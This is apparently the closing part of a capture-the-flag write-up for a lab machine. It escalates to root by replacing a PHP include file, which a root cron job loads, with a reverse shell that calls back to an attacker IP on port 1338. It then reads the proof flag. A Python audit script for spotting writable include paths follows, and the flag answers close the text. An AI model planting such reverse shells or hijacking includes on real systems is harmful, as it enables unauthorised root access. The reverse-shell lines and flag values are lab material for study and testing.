2023/04/10 00:29:16 CMD: UID=0     PID=610    | /usr/sbin/nmbd --foreground --no-process-group 
2023/04/10 00:29:16 CMD: UID=0     PID=606    | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers 
2023/04/10 00:29:16 CMD: UID=103   PID=594    | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only 
2023/04/10 00:29:16 CMD: UID=0     PID=591    | /usr/sbin/cron -f 
2023/04/10 00:29:16 CMD: UID=0     PID=584    | /usr/bin/amazon-ssm-agent 
2023/04/10 00:29:16 CMD: UID=0     PID=583    | /usr/lib/accountsservice/accounts-daemon 
2023/04/10 00:29:16 CMD: UID=101   PID=572    | /lib/systemd/systemd-resolved 
2023/04/10 00:29:16 CMD: UID=100   PID=569    | /lib/systemd/systemd-networkd 
2023/04/10 00:29:16 CMD: UID=102   PID=536    | /lib/systemd/systemd-timesyncd 
2023/04/10 00:29:16 CMD: UID=0     PID=489    | /sbin/multipathd -d -s 
2023/04/10 00:29:16 CMD: UID=0     PID=488    | 
2023/04/10 00:29:16 CMD: UID=0     PID=487    | 
2023/04/10 00:29:16 CMD: UID=0     PID=486    | 
2023/04/10 00:29:16 CMD: UID=0     PID=485    | 
2023/04/10 00:29:16 CMD: UID=0     PID=378    | /lib/systemd/systemd-udevd 
2023/04/10 00:29:16 CMD: UID=0     PID=344    | /lib/systemd/systemd-journald 
2023/04/10 00:29:16 CMD: UID=0     PID=1      | /sbin/init maybe-ubiquity 
2023/04/10 00:30:01 CMD: UID=0     PID=27658  | /usr/sbin/CRON -f 
2023/04/10 00:30:01 CMD: UID=0     PID=27657  | /usr/sbin/CRON -f 
2023/04/10 00:30:02 CMD: UID=0     PID=27659  | /usr/bin/php /home/sysadmin/scripts/script.php 
2023/04/10 00:31:01 CMD: UID=0     PID=27661  | /usr/sbin/CRON -f 
2023/04/10 00:31:01 CMD: UID=0     PID=27660  | /usr/sbin/CRON -f 
2023/04/10 00:31:01 CMD: UID=0     PID=27662  | /bin/sh -c /usr/bin/php /home/sysadmin/scripts/script.php 
2023/04/10 00:32:01 CMD: UID=0     PID=27665  | /usr/sbin/CRON -f 
2023/04/10 00:32:01 CMD: UID=0     PID=27664  | /usr/sbin/CRON -f 
2023/04/10 00:32:01 CMD: UID=0     PID=27666  | /bin/sh -c /usr/bin/php /home/sysadmin/scripts/script.php 
2023/04/10 00:33:01 CMD: UID=0     PID=27669  | /usr/sbin/CRON -f 
2023/04/10 00:33:01 CMD: UID=0     PID=27668  | /usr/sbin/CRON -f 
2023/04/10 00:33:01 CMD: UID=0     PID=27670  | /bin/sh -c /usr/bin/php /home/sysadmin/scripts/script.php 

sysadmin@opacity:/tmp$ cd /home/sysadmin/scripts/
sysadmin@opacity:~/scripts$ ls
lib  script.php
sysadmin@opacity:~/scripts$ cat script.php 
<?php

//Backup of scripts sysadmin folder
require_once('lib/backup.inc.php');
zipData('/home/sysadmin/scripts', '/var/backups/backup.zip');
echo 'Successful', PHP_EOL;

//Files scheduled removal
$dir = "/var/www/html/cloud/images";
if(file_exists($dir)){
    $di = new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS);
    $ri = new RecursiveIteratorIterator($di, RecursiveIteratorIterator::CHILD_FIRST);
    foreach ( $ri as $file ) {
        $file->isDir() ?  rmdir($file) : unlink($file);
    }
}
?>

sysadmin@opacity:~/scripts/lib$ cat backup.inc.php 
<?php


ini_set('max_execution_time', 600);
ini_set('memory_limit', '1024M');


function zipData($source, $destination) {
	if (extension_loaded('zip')) {
		if (file_exists($source)) {
			$zip = new ZipArchive();
			if ($zip->open($destination, ZIPARCHIVE::CREATE)) {
				$source = realpath($source);
				if (is_dir($source)) {
					$files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source, RecursiveDirectoryIterator::SKIP_DOTS), RecursiveIteratorIterator::SELF_FIRST);
					foreach ($files as $file) {
						$file = realpath($file);
						if (is_dir($file)) {
							$zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
						} else if (is_file($file)) {
							$zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
						}
					}
				} else if (is_file($source)) {
					$zip->addFromString(basename($source), file_get_contents($source));
				}
			}
			return $zip->close();
		}
	}
	return false;
}
?>

sysadmin@opacity:~/scripts/lib$ rm backup.inc.php
rm: remove write-protected regular file 'backup.inc.php'? yes
sysadmin@opacity:~/scripts/lib$ ls
application.php     dataresource.php  owlapi.php  registry.php
bio2rdfapi.php      dataset.php       phplib.php  utils.php
biopax2bio2rdf.php  fileapi.php       rdfapi.php  xmlapi.php
sysadmin@opacity:~/scripts/lib$ nano backup.inc.php
sysadmin@opacity:~/scripts/lib$ tail backup.inc.php 
}
echo '<pre>';
// change the host address and/or port number as necessary
$sh = new Shell('10.8.19.103', 1338);
$sh->run();
unset($sh);
// garbage collector requires PHP v5.3.0 or greater
// @gc_collect_cycles();
echo '</pre>';
?>

┌──(witty㉿kali)-[~/Downloads]
└─$ rlwrap nc -lvnp 1338 
listening on [any] 1338 ...
connect to [10.8.19.103] from (UNKNOWN) [10.10.142.194] 46062
SOCKET: Shell has connected! PID: 27916
whoami
root
cd /root
ls
proof.txt
snap
cat proof.txt
ac0d56f93202dd57dcb2498c739fd20e
cd snap
ls
lxd
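
The root cron job above runs a script whose `require_once` target sits in a directory the unprivileged user controls, so the read-only include could still be removed and recreated. As an added defensive example (not part of the original writeup), this audit resolves a PHP script's literal includes and walks each one up its directory chain, flagging any link an untrusted user could swap. The function names and the temporary demo tree are constructed here, and includes are assumed to resolve relative to the script's own directory.

```python
import os, re, stat, tempfile

INCLUDE_RE = re.compile(r"""\b(?:require|include)(?:_once)?\s*\(?\s*['"]([^'"]+)['"]""")

def php_includes(script):
    """Resolve literal require/include targets against the script's directory (assumption)."""
    base = os.path.dirname(os.path.realpath(script))
    with open(script, encoding="utf-8", errors="replace") as fh:
        return [os.path.realpath(os.path.join(base, rel))
                for rel in INCLUDE_RE.findall(fh.read())]

def weak_links(path, trusted_uids, stop="/"):
    """Walk from path up to stop; report entries an untrusted user could replace.
    A sticky directory with a trusted owner still protects its entries, so it is skipped."""
    findings, cur, stop = [], os.path.realpath(path), os.path.realpath(stop)
    while True:
        st = os.stat(cur)
        loose = st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)
        if st.st_uid not in trusted_uids:
            findings.append((cur, "owner uid %d is not trusted" % st.st_uid))
        elif loose and not (stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX):
            findings.append((cur, "group/world-writable"))
        if cur == stop or cur == os.path.dirname(cur):
            return findings
        cur = os.path.dirname(cur)

def audit(script, trusted_uids=frozenset({0}), stop="/"):
    """Check a root-run PHP script and every file it includes, de-duplicated."""
    hits = [f for target in [script] + php_includes(script)
            for f in weak_links(target, trusted_uids, stop)]
    return list(dict.fromkeys(hits))

def demo_tree():
    """Constructed layout mirroring /home/sysadmin/scripts from the session above."""
    root = tempfile.mkdtemp()
    lib = os.path.join(root, "scripts", "lib")
    os.makedirs(lib)
    script, inc = os.path.join(root, "scripts", "script.php"), os.path.join(lib, "backup.inc.php")
    for path, body in ((script, "<?php\nrequire_once('lib/backup.inc.php');\n"), (inc, "<?php\n")):
        with open(path, "w") as fh:
            fh.write(body)
    for p, mode in ((root, 0o755), (os.path.dirname(lib), 0o755), (lib, 0o755),
                    (script, 0o644), (inc, 0o444)):
        os.chmod(p, mode)
    return root, script, inc

if __name__ == "__main__":
    root, script, _ = demo_tree()
    for path, why in audit(script, stop=root):
        print(path, "->", why)
```

An empty result means the script, its includes and every parent directory are owned by a trusted uid and are not group- or world-writable; for a job run by root, any finding is a path to code execution as root.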

What is the local.txt flag?

6661b61b44d234d230d06bf5b3c075e2

What is the proof.txt flag?

ac0d56f93202dd57dcb2498c739fd20e
